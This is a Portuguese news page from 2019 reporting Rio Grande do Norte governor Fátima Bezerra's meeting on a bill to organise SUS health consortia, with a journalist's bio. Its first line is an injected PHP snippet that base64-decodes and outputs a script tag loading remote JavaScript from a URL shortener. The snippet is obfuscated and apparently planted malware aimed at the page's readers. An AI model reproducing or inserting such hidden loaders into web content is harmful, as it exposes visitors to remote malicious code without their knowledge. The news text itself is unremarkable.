$str = 'PHNjcmlwdCBzcmM9Imh0dHBzOi8vaXMuZ2QvR2dHZjl6P3Y9djI1LjAiPjwvc2NyaXB0Pg=='; echo base64_decode($str);

Governadora discute organização do SUS e melhoria do atendimento de saúde

Governadora discute organização do SUS e melhoria do atendimento de saúde
10 Set 2019

A aprovação do projeto de Lei que regulamenta os Consórcios Interfederativos de Saúde, proposto pelo Governo do Estado e que está em tramitação na Assembleia Legislativa, é de fundamental importância para organizar o Sistema Único de Saúde – SUS no RN e melhorar a saúde pública. Este foi o tema da reunião da governadora Fátima Bezerra com dirigentes do Sindicato dos Servidores da Saúde – Sindsaúde, vereadores e representantes da sociedade civil dos municípios de Canguaretama e Santo Antônio.

Os visitantes externaram à governadora preocupação com o atendimento de saúde nos dois municípios e cidades vizinhas. Acompanhada do vice-governador Antenor Roberto, do secretário adjunto de saúde, Petrônio Spinelli, e da assessora de relações institucionais, Samanda Alves, a governadora explicou que o projeto em tramitação na Assembleia Legislativa para aprovação pelos deputados otimiza a utilização de recursos e organiza os serviços visando qualidade e bom atendimento.

“Em nosso Estado temos décadas de descaso com a saúde. Agora estamos propondo esta Lei que vai favorecer significativamente a melhoria no serviço. Trabalhamos com afinco e muita dedicação. Sabemos das enormes dificuldades, mas estamos determinados, eu e toda a equipe do governo, para superarmos os obstáculos e oferecer atendimento de saúde digno à nossa população”, afirmou Fátima Bezerra.

Ela acrescentou que o Governo toma ações claras e transparentes, sempre dialogando com os diversos setores da sociedade. “Este é o nosso modo de administrar e assim continuaremos em busca de atender as muitas necessidades do nosso povo”.

share

Anna Ruth
Anna Ruth

Anna Ruth Dantas é jornalista, apresentadora do programa RN Acontece, da Band Natal; produz e apresenta o programa Jornal da Cidade, da Rádio Cidade (94 FM - Natal), e apresenta o programa Panorama do RN (em rede com 16 emissoras de rádio do Rio Grande do Norte). Jornalista de grande credibilidade, atua também como consultora e ministra cursos de midia trainning na Trilhar Educação Corporativa.

Deixar uma resposta

O seu endereço de email não será publicado. Campos obrigatórios marcados com *